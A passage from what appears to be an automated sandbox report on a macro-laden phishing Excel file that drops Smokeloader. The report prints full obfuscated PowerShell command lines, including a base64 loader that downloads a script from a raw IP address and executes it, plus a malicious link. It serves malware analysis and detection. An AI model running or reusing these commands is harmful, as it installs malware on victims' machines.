QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\vtjrhjiMemory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 30_2_00402F5D RtlCreateUserThread,NtTerminateProcess,30_2_00402F5D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 30_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,30_2_004014BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 30_2_00402321 NtQuerySystemInformation,NtQueryInformationProcess,30_2_00402321
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 30_2_004025D3 NtClose,30_2_004025D3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 30_2_004014D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,30_2_004014D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 30_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess,30_2_004022D8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 30_2_004022D9 NtQuerySystemInformation,NtQueryInformationProcess,30_2_004022D9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 30_2_004022E5 NtQuerySystemInformation,NtQueryInformationProcess,30_2_004022E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 30_2_004014E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,30_2_004014E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 30_2_004014EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,30_2_004014EB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 30_2_004022F7 NtQuerySystemInformation,NtQueryInformationProcess,30_2_004022F7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 30_2_00402686 NtClose,30_2_00402686
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 30_2_0040328D GetModuleHandleA,Sleep,MapViewOfFile,LocalAlloc,OpenProcessToken,NtCreateSection,NtMapViewOfSection,NtAllocateVirtualMemory,NtDuplicateObject,NtOpenKey,NtQueryKey,RtlCreateUserThread,wcsstr,towlower,30_2_0040328D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 30_2_004030BF RtlCreateUserThread,NtTerminateProcess,30_2_004030BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 34_2_00403003 RtlCreateUserThread,NtTerminateProcess,34_2_00403003
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 34_2_004030BF RtlCreateUserThread,NtTerminateProcess,34_2_004030BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00124B92 RtlMoveMemory,NtUnmapViewOfSection,38_2_00124B92
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_001233C3 NtQueryInformationFile,38_2_001233C3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_0012342B NtQueryObject,NtQueryObject,RtlMoveMemory,38_2_0012342B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_0012349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,38_2_0012349B
          Source: C:\Windows\explorer.exeCode function: 39_2_000638B0 NtUnmapViewOfSection,39_2_000638B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 40_2_00081016 RtlMoveMemory,NtUnmapViewOfSection,40_2_00081016
          Source: C:\Windows\explorer.exeCode function: 42_2_00065300 RtlAllocateHeap,NtUnmapViewOfSection,42_2_00065300
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_0012219838_2_00122198
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_0012C2F938_2_0012C2F9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_0013B35C38_2_0013B35C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_0017443838_2_00174438
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_0013B97E38_2_0013B97E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00126E6A38_2_00126E6A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00145F0838_2_00145F08
          Source: C:\Windows\explorer.exeCode function: 39_2_00061E2039_2_00061E20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 40_2_0008170B40_2_0008170B
          Source: C:\Windows\explorer.exeCode function: 42_2_00062C0042_2_00062C00
          Source: #U3010TW-S PO#U3011PO#3311-20241118003.xlsOLE indicator, VBA macros: true
          Source: #U3010TW-S PO#U3011PO#3311-20241118003.xlsStream path 'MBD014EF418/\x1Ole' : https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen\}}#n~;|gF'dc8DcJ0<N4yHJcG0u9fhskHPDdWTv142FCFvX5bxn0OFlqPg1O8XHZJSdIclASVNxB25CYWUPv9FfhHEzyOqunUOYR48diJ4uXddNKO9Lhk65B7brb8K7ss4wczM6JRR4hihVvaps4vZXHqLZiFffh31b9YGh0XBRDICiuRzAh#+U//WHq
          Source: D6330000.0.drStream path 'MBD014EF418/\x1Ole' : https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen\}}#n~;|gF'dc8DcJ0<N4yHJcG0u9fhskHPDdWTv142FCFvX5bxn0OFlqPg1O8XHZJSdIclASVNxB25CYWUPv9FfhHEzyOqunUOYR48diJ4uXddNKO9Lhk65B7brb8K7ss4wczM6JRR4hihVvaps4vZXHqLZiFffh31b9YGh0XBRDICiuRzAh#+U//WHq
          Source: ~DF7DC820911769618A.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 00127F70 appears 32 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 00128801 appears 40 times
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2034
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2358
          Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2034
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2358
          Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2034Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2358Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2034
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2358
          Source: 00000022.00000002.567719148.0000000000261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 0000001E.00000002.522714130.00000000000C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 0000001E.00000002.522844560.00000000001F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 2104, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 3836, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLS@62/54@11/4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 40_2_0008274A CreateToolhelp32Snapshot,Process32First,lstrcmpi,Process32Next,CloseHandle,40_2_0008274A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00124440 CoCreateInstance,SysAllocString,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,wsprintfW,38_2_00124440
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\D6330000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\vtjrhjiMutant created: NULL
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR9221.tmpJump to behavior
          Source: #U3010TW-S PO#U3011PO#3311-20241118003.xlsOLE indicator, Workbook stream: true
          Source: PORTS SITUATION BULK CARRIERS.xlsx.0.drOLE indicator, Workbook stream: true
          Source: D6330000.0.drOLE indicator, Workbook stream: true
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.m.......m..............................................................3........Y.............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....H.......P.........Y.............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w............\.......................(.P.....H.......P.......8...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............0(\........l......[.....(.P.....H.......P.......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w............\.......................(.P.....H.......P.......8...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............0(\........l......[.....(.P.....H.......P.......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0(\........l......[.....(.P.....H.......P............... .......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .D.e.V.I.c.E.C.r.E.d.e.n.T.i.A.l.d.e.P.l.O.Y.M.E.n.T...e.x.e.H.......P...............@.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.H.......P...............@.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............0(\........l......[.....(.P.....H.......P.......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............0(\........l......[.....(.P.....H.......P...............l.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ...............}..w............0(\........l......[.....(.P.....H.......P.......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m.....}..w.............................1......(.P..............3......................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....................................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.m.......m.....pY......................pY......xY.......................3......8...............pY..............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....4...............8...............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3......................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................GT.l....}..w............\.......................(.P.....4...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............X.S......T.l......R.....(.P.....4...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................GT.l....}..w............\.......................(.P.....4...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............X.S......T.l......R.....(.P.....4...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.X.S......T.l......R.....(.P.....4....................... .......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .D.e.V.I.c.E.C.r.E.d.e.n.T.i.A.l.d.e.P.l.O.Y.M.E.n.T...e.x.e.4.......................@.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.4.......................@.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............X.S......T.l......R.....(.P.....4...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............X.S......T.l......R.....(.P.....4.......................l.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ...............}..w............X.S......T.l......R.....(.P.....4...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m.....}..w.............................1......(.P..............3......................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....................................................
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: #U3010TW-S PO#U3011PO#3311-20241118003.xlsReversingLabs: Detection: 27%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2B07.tmp" "c:\Users\user\AppData\Local\Temp\03wlztsz\CSC280AB7AC39534067B2898716E8B346.TMP"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 